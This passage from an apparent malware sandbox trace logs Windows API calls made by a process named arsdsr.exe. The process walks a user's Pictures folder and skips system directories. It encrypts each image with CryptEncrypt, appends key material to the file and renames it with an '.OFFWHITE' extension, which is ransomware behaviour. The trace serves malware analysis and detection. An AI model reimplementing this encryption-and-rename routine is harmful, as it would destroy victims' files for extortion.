lstrcmpiW (lpString1="cLZ7.png", lpString2="program files (x86)") returned -1 [0135.364] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.365] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="cLZ7.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png" [0135.365] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.365] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.365] PathFindExtensionW (pszPath="cLZ7.png") returned=".png" [0135.365] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.365] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.365] lstrcmpiW (lpString1="cLZ7.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.365] GetProcessHeap () returned 0x500000 [0135.365] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a00 [0135.365] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\clz7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.366] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=89188) returned 1 [0135.366] GetProcessHeap () returned 0x500000 [0135.366] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.366] GetProcessHeap () returned 0x500000 [0135.366] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.366] GetProcessHeap () returned 0x500000 [0135.366] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.366] GetProcessHeap () returned 0x500000 [0135.366] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.366] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.366] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.366] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.366] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.366] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.366] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.366] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.366] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.366] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.367] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.367] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.367] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.367] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15c64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.367] SetLastError (dwErrCode=0x0) [0135.367] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.369] GetLastError () returned 0x0 [0135.369] GetLastError () returned 0x0 [0135.369] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15d64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.369] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.369] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x15e64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.370] WriteFile (in: hFile=0x218, lpBuffer=0x531a00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a00*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.370] GetProcessHeap () returned 0x500000 [0135.370] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15c64) returned 0x55c7c8 [0135.370] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.370] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x15c64, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x15c64, lpOverlapped=0x0) returned 1 [0135.378] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.378] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x15c64, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x15c64, lpOverlapped=0x0) returned 1 [0135.379] GetProcessHeap () returned 0x500000 [0135.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.379] CloseHandle (hObject=0x218) returned 1 [0135.382] GetProcessHeap () returned 0x500000 [0135.382] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.382] GetProcessHeap () returned 0x500000 [0135.382] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.382] GetProcessHeap () returned 0x500000 [0135.382] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.382] GetProcessHeap () returned 0x500000 [0135.382] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.383] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png" [0135.383] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png.OFFWHITE" [0135.383] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\clz7.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\cLZ7.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\clz7.png.offwhite")) returned 1 [0135.384] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee5330, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x4f706190, ftLastAccessTime.dwHighDateTime=0x1d5e668, ftLastWriteTime.dwLowDateTime=0x4f706190, ftLastWriteTime.dwHighDateTime=0x1d5e668, nFileSizeHigh=0x0, nFileSizeLow=0x161fd, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="EMZiJcO8LeV0.jpg", cAlternateFileName="EMZIJC~1.JPG")) returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2=".") returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="..") returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="...") returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="windows") returned -1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="$recycle.bin") returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="rsa") returned -1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="ntuser.dat") returned -1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="programdata") returned -1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="appdata") returned 1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="program files") returned -1 [0135.384] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="program files (x86)") returned -1 [0135.384] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.384] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="EMZiJcO8LeV0.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg" [0135.384] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.384] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.384] PathFindExtensionW (pszPath="EMZiJcO8LeV0.jpg") returned=".jpg" [0135.384] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.385] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.385] lstrcmpiW (lpString1="EMZiJcO8LeV0.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.385] GetProcessHeap () returned 0x500000 [0135.385] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a10 [0135.385] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\emzijco8lev0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.386] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=90621) returned 1 [0135.386] GetProcessHeap () returned 0x500000 [0135.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.386] GetProcessHeap () returned 0x500000 [0135.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.386] GetProcessHeap () returned 0x500000 [0135.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.386] GetProcessHeap () returned 0x500000 [0135.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.386] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.386] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.386] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.386] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.386] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.386] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.386] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.386] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.386] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.387] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.387] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.387] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.387] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x161fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.387] SetLastError (dwErrCode=0x0) [0135.387] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.390] GetLastError () returned 0x0 [0135.390] GetLastError () returned 0x0 [0135.390] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x162fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.390] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.390] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x163fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.390] WriteFile (in: hFile=0x218, lpBuffer=0x531a10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a10*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.390] GetProcessHeap () returned 0x500000 [0135.390] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x161fd) returned 0x55c7c8 [0135.390] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.390] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x161fd, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x161fd, lpOverlapped=0x0) returned 1 [0135.397] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.397] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x161fd, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x161fd, lpOverlapped=0x0) returned 1 [0135.397] GetProcessHeap () returned 0x500000 [0135.397] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.397] CloseHandle (hObject=0x218) returned 1 [0135.399] GetProcessHeap () returned 0x500000 [0135.399] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.399] GetProcessHeap () returned 0x500000 [0135.399] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.399] GetProcessHeap () returned 0x500000 [0135.399] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.400] GetProcessHeap () returned 0x500000 [0135.400] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.400] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg" [0135.400] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg.OFFWHITE" [0135.400] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\emzijco8lev0.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\EMZiJcO8LeV0.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\emzijco8lev0.jpg.offwhite")) returned 1 [0135.401] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f33090, ftCreationTime.dwHighDateTime=0x1d5dd47, ftLastAccessTime.dwLowDateTime=0xab8af00, ftLastAccessTime.dwHighDateTime=0x1d5e652, ftLastWriteTime.dwLowDateTime=0xab8af00, ftLastWriteTime.dwHighDateTime=0x1d5e652, nFileSizeHigh=0x0, nFileSizeLow=0xebde, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="k3RDFcVCi.png", cAlternateFileName="K3RDFC~1.PNG")) returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2=".") returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="..") returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="...") returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="windows") returned -1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="$recycle.bin") returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="rsa") returned -1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="ntuser.dat") returned -1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="programdata") returned -1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="appdata") returned 1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="program files") returned -1 [0135.401] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="program files (x86)") returned -1 [0135.401] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.402] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="k3RDFcVCi.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png" [0135.402] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.402] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.402] PathFindExtensionW (pszPath="k3RDFcVCi.png") returned=".png" [0135.402] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.402] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.402] lstrcmpiW (lpString1="k3RDFcVCi.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.402] GetProcessHeap () returned 0x500000 [0135.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a20 [0135.402] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\k3RDFcVCi.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\k3rdfcvci.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 